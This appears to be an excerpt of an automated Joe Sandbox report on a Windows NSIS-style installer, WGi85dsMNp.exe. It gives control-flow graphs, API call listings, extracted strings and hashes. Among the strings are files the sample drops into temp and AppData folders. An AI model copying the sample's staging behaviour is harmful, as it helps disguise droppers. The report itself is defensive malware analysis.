                                                                                                      • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                      • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                                                                      • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                      • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C
                                                                                                      APIs
                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$EnableShow
                                                                                                      • String ID:
                                                                                                      • API String ID: 1136574915-0
                                                                                                      • Opcode ID: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                                                                      • Instruction ID: b41365517dadb09c69eaf87789fd34eb77fb4a5ff64ddc4fb458d6156a5e0ce1
                                                                                                      • Opcode Fuzzy Hash: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                                                                      • Instruction Fuzzy Hash: DFE0DF32E08200CFE724EFA5AA494AD77B4EB80324B20847FF201F11D1CE7858818F6E

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 261 403e86-403e98 262 403fd9-403fe8 261->262 263 403e9e-403ea4 261->263 264 404037-40404c 262->264 265 403fea-404032 GetDlgItem * 2 call 40435f SetClassLongW call 40140b 262->265 263->262 266 403eaa-403eb3 263->266 268 40408c-404091 call 4043ab 264->268 269 40404e-404051 264->269 265->264 270 403eb5-403ec2 SetWindowPos 266->270 271 403ec8-403ecb 266->271 283 404096-4040b1 268->283 275 404053-40405e call 401389 269->275 276 404084-404086 269->276 270->271 272 403ee5-403eeb 271->272 273 403ecd-403edf ShowWindow 271->273 278 403f07-403f0a 272->278 279 403eed-403f02 DestroyWindow 272->279 273->272 275->276 298 404060-40407f SendMessageW 275->298 276->268 282 40432c 276->282 287 403f0c-403f18 SetWindowLongW 278->287 288 403f1d-403f23 278->288 284 404309-40430f 279->284 286 40432e-404335 282->286 290 4040b3-4040b5 call 40140b 283->290 291 4040ba-4040c0 283->291 284->282 293 404311-404317 284->293 287->286 296 403fc6-403fd4 call 4043c6 288->296 297 403f29-403f3a GetDlgItem 288->297 290->291 294 4040c6-4040d1 291->294 295 4042ea-404303 DestroyWindow EndDialog 291->295 293->282 299 404319-404322 ShowWindow 293->299 294->295 300 4040d7-404124 call 40640a call 40435f * 3 GetDlgItem 294->300 295->284 296->286 301 403f59-403f5c 297->301 302 403f3c-403f53 SendMessageW IsWindowEnabled 297->302 298->286 299->282 331 404126-40412b 300->331 332 40412e-40416a ShowWindow KiUserCallbackDispatcher call 404381 EnableWindow 300->332 305 403f61-403f64 301->305 306 403f5e-403f5f 301->306 302->282 302->301 310 403f72-403f77 305->310 311 403f66-403f6c 305->311 309 403f8f-403f94 call 404338 306->309 309->296 314 403fad-403fc0 SendMessageW 310->314 316 403f79-403f7f 310->316 311->314 315 403f6e-403f70 311->315 314->296 315->309 317 403f81-403f87 call 40140b 316->317 318 403f96-403f9f call 40140b 316->318 327 403f8d 317->327 318->296 328 403fa1-403fab 318->328 327->309 328->327 331->332 335 40416c-40416d 332->335 336 40416f 332->336 337 404171-40419f GetSystemMenu EnableMenuItem SendMessageW 335->337 336->337 338 4041a1-4041b2 SendMessageW 337->338 339 4041b4 337->339 340 4041ba-4041f9 call 404394 call 403e67 call 4063e8 lstrlenW call 40640a SetWindowTextW call 401389 338->340 339->340 340->283 351 4041ff-404201 340->351 351->283 352 404207-40420b 351->352 353 40422a-40423e DestroyWindow 352->353 354 40420d-404213 352->354 353->284 356 404244-404271 CreateDialogParamW 353->356 354->282 355 404219-40421f 354->355 355->283 357 404225 355->357 356->284 358 404277-4042ce call 40435f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 356->358 357->282 358->282 363 4042d0-4042e8 ShowWindow call 4043ab 358->363 363->284
                                                                                                      APIs
                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                                      • ShowWindow.USER32(?), ref: 00403EDF
                                                                                                      • DestroyWindow.USER32 ref: 00403EF3
                                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                                                                      • GetDlgItem.USER32(?,?), ref: 00403F30
                                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                                      • GetDlgItem.USER32(?,?), ref: 00403FF9
                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                                      • SendMessageW.USER32(0000040F,00000000,?,?), ref: 0040406E
                                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                                                                      • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404147
                                                                                                      • EnableWindow.USER32(?,?), ref: 00404162
                                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00404178
                                                                                                      • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                                                                      • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404197
                                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                                      • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                                                                      • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                                                                      • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                      • String ID: (7B
                                                                                                      • API String ID: 3282139019-3251261122
                                                                                                      • Opcode ID: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                                                                      • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                                                                      • Opcode Fuzzy Hash: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                                                                      • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 366 403ad8-403af0 call 4067c2 369 403af2-403b02 call 40632f 366->369 370 403b04-403b3b call 4062b6 366->370 378 403b5e-403b87 call 403dae call 405dc5 369->378 374 403b53-403b59 lstrcatW 370->374 375 403b3d-403b4e call 4062b6 370->375 374->378 375->374 384 403c19-403c21 call 405dc5 378->384 385 403b8d-403b92 378->385 391 403c23-403c2a call 40640a 384->391 392 403c2f-403c54 LoadImageW 384->392 385->384 386 403b98-403bb2 call 4062b6 385->386 390 403bb7-403bc0 386->390 390->384 395 403bc2-403bc6 390->395 391->392 393 403cd5-403cdd call 40140b 392->393 394 403c56-403c86 RegisterClassW 392->394 408 403ce7-403cf2 call 403dae 393->408 409 403cdf-403ce2 393->409 397 403da4 394->397 398 403c8c-403cd0 SystemParametersInfoW CreateWindowExW 394->398 400 403bd8-403be4 lstrlenW 395->400 401 403bc8-403bd5 call 405cea 395->401 406 403da6-403dad 397->406 398->393 402 403be6-403bf4 lstrcmpiW 400->402 403 403c0c-403c14 call 405cbd call 4063e8 400->403 401->400 402->403 407 403bf6-403c00 GetFileAttributesW 402->407 403->384 412 403c02-403c04 407->412 413 403c06-403c07 call 405d09 407->413 419 403cf8-403d12 ShowWindow call 406752 408->419 420 403d7b-403d83 call 405523 408->420 409->406 412->403 412->413 413->403 427 403d14-403d19 call 406752 419->427 428 403d1e-403d30 GetClassInfoW 419->428 425 403d85-403d8b 420->425 426 403d9d-403d9f call 40140b 420->426 425->409 429 403d91-403d98 call 40140b 425->429 426->397 427->428 432 403d32-403d42 GetClassInfoW RegisterClassW 428->432 433 403d48-403d6b DialogBoxParamW call 40140b 428->433 429->409 432->433 436 403d70-403d79 call 403a28 433->436 436->406
                                                                                                      APIs
                                                                                                        • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                        • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                      • lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\,75923420,00435000,00000000), ref: 00403B59
                                                                                                      • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,00435800,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BD9
                                                                                                      • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,00435800,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                                                                      • GetFileAttributesW.KERNEL32(Call), ref: 00403BF7
                                                                                                      • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,00435800), ref: 00403C40
                                                                                                        • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                      • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                                                                      • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                                                                      • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                      • String ID: (7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                      • API String ID: 1975747703-3853389976
                                                                                                      • Opcode ID: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
                                                                                                      • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                                                                      • Opcode Fuzzy Hash: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
                                                                                                      • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 440 402f30-402f7e GetTickCount GetModuleFileNameW call 405ede 443 402f80-402f85 440->443 444 402f8a-402fb8 call 4063e8 call 405d09 call 4063e8 GetFileSize 440->444 446 4031cf-4031d3 443->446 452 4030a8-4030b6 call 402e8e 444->452 453 402fbe-402fd5 444->453 459 403187-40318c 452->459 460 4030bc-4030bf 452->460 455 402fd7 453->455 456 402fd9-402fe6 call 403447 453->456 455->456 464 403143-40314b call 402e8e 456->464 465 402fec-402ff2 456->465 459->446 462 4030c1-4030d9 call 40345d call 403447 460->462 463 4030eb-403137 GlobalAlloc call 406923 call 405f0d CreateFileW 460->463 462->459 491 4030df-4030e5 462->491 488 403139-40313e 463->488 489 40314d-40317d call 40345d call 4031d6 463->489 464->459 469 403072-403076 465->469 470 402ff4-40300c call 405e99 465->470 473 403078-40307e call 402e8e 469->473 474 40307f-403085 469->474 470->474 487 40300e-403015 470->487 473->474 479 403087-403095 call 4068b5 474->479 480 403098-4030a2 474->480 479->480 480->452 480->453 487->474 490 403017-40301e 487->490 488->446 500 403182-403185 489->500 490->474 493 403020-403027 490->493 491->459 491->463 493->474 495 403029-403030 493->495 495->474 497 403032-403052 495->497 497->459 499 403058-40305c 497->499 501 403064-40306c 499->501 502 40305e-403062 499->502 500->459 503 40318e-40319f 500->503 501->474 504 40306e-403070 501->504 502->452 502->501 505 4031a1 503->505 506 4031a7-4031ac 503->506 504->474 505->506 507 4031ad-4031b3 506->507 507->507 508 4031b5-4031cd call 405e99 507->508 508->446
                                                                                                      APIs
                                                                                                      • GetTickCount.KERNEL32 ref: 00402F44
                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\WGi85dsMNp.exe,00000400), ref: 00402F60
                                                                                                        • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\WGi85dsMNp.exe,80000000,00000003), ref: 00405EE2
                                                                                                        • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\WGi85dsMNp.exe,C:\Users\user\Desktop\WGi85dsMNp.exe,80000000,00000003), ref: 00402FA9
                                                                                                      • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030F0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\WGi85dsMNp.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                      • API String ID: 2803837635-2070875808
                                                                                                      • Opcode ID: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                                      • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                                                                      • Opcode Fuzzy Hash: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                                      • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 724 40640a-406415 725 406417-406426 724->725 726 406428-40643e 724->726 725->726 727 406444-406451 726->727 728 406656-40665c 726->728 727->728 731 406457-40645e 727->731 729 406662-40666d 728->729 730 406463-406470 728->730 733 406678-406679 729->733 734 40666f-406673 call 4063e8 729->734 730->729 732 406476-406482 730->732 731->728 735 406643 732->735 736 406488-4064c6 732->736 734->733 740 406651-406654 735->740 741 406645-40664f 735->741 738 4065e6-4065ea 736->738 739 4064cc-4064d7 736->739 744 4065ec-4065f2 738->744 745 40661d-406621 738->745 742 4064f0 739->742 743 4064d9-4064de 739->743 740->728 741->728 749 4064f7-4064fe 742->749 743->742 746 4064e0-4064e3 743->746 747 406602-40660e call 4063e8 744->747 748 4065f4-406600 call 40632f 744->748 750 406630-406641 lstrlenW 745->750 751 406623-40662b call 40640a 745->751 746->742 753 4064e5-4064e8 746->753 762 406613-406619 747->762 748->762 755 406500-406502 749->755 756 406503-406505 749->756 750->728 751->750 753->742 758 4064ea-4064ee 753->758 755->756 760 406540-406543 756->760 761 406507-40652e call 4062b6 756->761 758->749 763 406553-406556 760->763 764 406545-406551 GetSystemDirectoryW 760->764 774 406534-40653b call 40640a 761->774 775 4065ce-4065d1 761->775 762->750 766 40661b 762->766 768 4065c1-4065c3 763->768 769 406558-406566 GetWindowsDirectoryW 763->769 767 4065c5-4065c9 764->767 771 4065de-4065e4 call 40667c 766->771 767->771 776 4065cb 767->776 768->767 773 406568-406572 768->773 769->768 771->750 779 406574-406577 773->779 780 40658c-4065a2 SHGetSpecialFolderLocation 773->780 774->767 775->771 777 4065d3-4065d9 lstrcatW 775->777 776->775 777->771 779->780 783 406579-406580 779->783 784 4065a4-4065bb SHGetPathFromIDListW CoTaskMemFree 780->784 785 4065bd 780->785 786 406588-40658a 783->786 784->767 784->785 785->768 786->767 786->780
                                                                                                      APIs
                                                                                                      • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040654B
                                                                                                      • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                                                                      • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 004065A8
                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                                      • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                      • lstrlenW.KERNEL32(Call,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                      • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                      • API String ID: 717251189-1230650788
                                                                                                      • Opcode ID: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
                                                                                                      • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                                                                      • Opcode Fuzzy Hash: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
                                                                                                      • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 851 40176f-401794 call 402c41 call 405d34 856 401796-40179c call 4063e8 851->856 857 40179e-4017b0 call 4063e8 call 405cbd lstrcatW 851->857 863 4017b5-4017b6 call 40667c 856->863 857->863 866 4017bb-4017bf 863->866 867 4017c1-4017cb call 40672b 866->867 868 4017f2-4017f5 866->868 876 4017dd-4017ef 867->876 877 4017cd-4017db CompareFileTime 867->877 870 4017f7-4017f8 call 405eb9 868->870 871 4017fd-401819 call 405ede 868->871 870->871 878 40181b-40181e 871->878 879 40188d-4018b6 call 405450 call 4031d6 871->879 876->868 877->876 880 401820-40185e call 4063e8 * 2 call 40640a call 4063e8 call 405a4e 878->880 881 40186f-401879 call 405450 878->881 893 4018b8-4018bc 879->893 894 4018be-4018ca SetFileTime 879->894 880->866 914 401864-401865 880->914 891 401882-401888 881->891 895 402ace 891->895 893->894 897 4018d0-4018db CloseHandle 893->897 894->897 899 402ad0-402ad4 895->899 900 4018e1-4018e4 897->900 901 402ac5-402ac8 897->901 903 4018e6-4018f7 call 40640a lstrcatW 900->903 904 4018f9-4018fc call 40640a 900->904 901->895 909 401901-4022fc call 405a4e 903->909 904->909 909->899 914->891 916 401867-401868 914->916 916->881
                                                                                                      APIs
                                                                                                      • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Iw\Unnumberable,?,?,00000031), ref: 004017B0
                                                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Iw\Unnumberable,?,?,00000031), ref: 004017D5
                                                                                                        • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                        • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                        • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                        • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                        • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                      • String ID: C:\Users\user\AppData\Local\Iw\Unnumberable$C:\Users\user\AppData\Local\Temp\nsoC476.tmp$C:\Users\user\AppData\Local\Temp\nsoC476.tmp\System.dll$Call
                                                                                                      • API String ID: 1941528284-110332879
                                                                                                      • Opcode ID: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                                                                      • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                                                                      • Opcode Fuzzy Hash: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                                                                      • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
